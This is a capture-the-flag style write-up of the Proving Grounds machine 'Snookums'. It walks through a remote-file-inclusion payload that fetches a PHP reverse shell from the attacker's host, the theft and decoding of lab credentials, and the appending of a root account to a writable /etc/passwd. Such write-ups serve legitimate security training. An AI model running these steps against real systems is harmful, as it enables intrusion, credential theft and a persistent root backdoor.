Snookums

Source: Proving Grounds OS: Linux Community Rating: Intermediate

Enumeration & Reconnaissance

  • Autorecon revealed open ports:

    • FTP (21)

    • SSH (22)

    • HTTP (80)

    • RPC (111)

    • SMB (139 & 445)

    • MySQL (3306 & 33060)

  • Usually, I’d check FTP first, especially since anonymous login was allowed, but I dove straight into HTTP (80) and got too involved to notice FTP until later.

Service Analysis

  • The HTTP server hosted a Simple PHP Photo Gallery (v0.8).

Simple PHP Photo Gallery
  • A version number at the bottom screamed "vulnerable." Searching for CVEs led me to EDB-ID 48424 (no CVE assigned), an RFI vulnerability in the img parameter:

http://192.168.192.58/image.php?img=http://192.168.45.201/shell.php

Gaining Initial Access

  • I crafted a PHP reverse shell and hosted it on my machine. Initial attempts with ports 901/9911 failed, likely firewall issues. Switching to ports 80/22 worked, and I landed a shell as apache.

Initial Access
  • Uploaded linpeas.sh, which flagged a PHP config file containing MySQL credentials: root:MalapropDoffUtilize1337.

Database Credentials
mysql -u root -p
  • Found the SimplePHPGal database. That had a users table with 3 users alongside their encoded passwords, I picked the user michael since it was the one that's in the home directory.

Users Passwords
echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -d
  • Decoding it gave HockSydneyCertify123.

HockSydneyCertify123

Privilege Escalation

  • I then switched to michael and re-ran linpeas.sh, which revealed writable /etc/passwd.

/etc/passwd
  • It means we can add a new user as root. I generated a password hash for "pwned":

openssl passwd pwned
openssl passwd
  • Appended a new root user, kingkong, to /etc/passwd using echo:

echo "kingkong:\$1\$xr7pWWIR\$vNF8Z7sc8mgBu6u7ZETyT/:0:0:root:/root:/bin/bash" >> /etc/passwd  
  • Switching to kingkong granted root access.

Root Access

Lessons Learned

  • FTP Blindness: Skipping FTP might cost time, check obvious services first.

  • RFI Port Woes: Firewalls hate fancy ports, stick to 80/443 for shells.

  • Double Encoding: Always decode twice… or thrice.

  • /etc/passwd Write Abuse: If writable, plant a root user and call it a day.

Last updated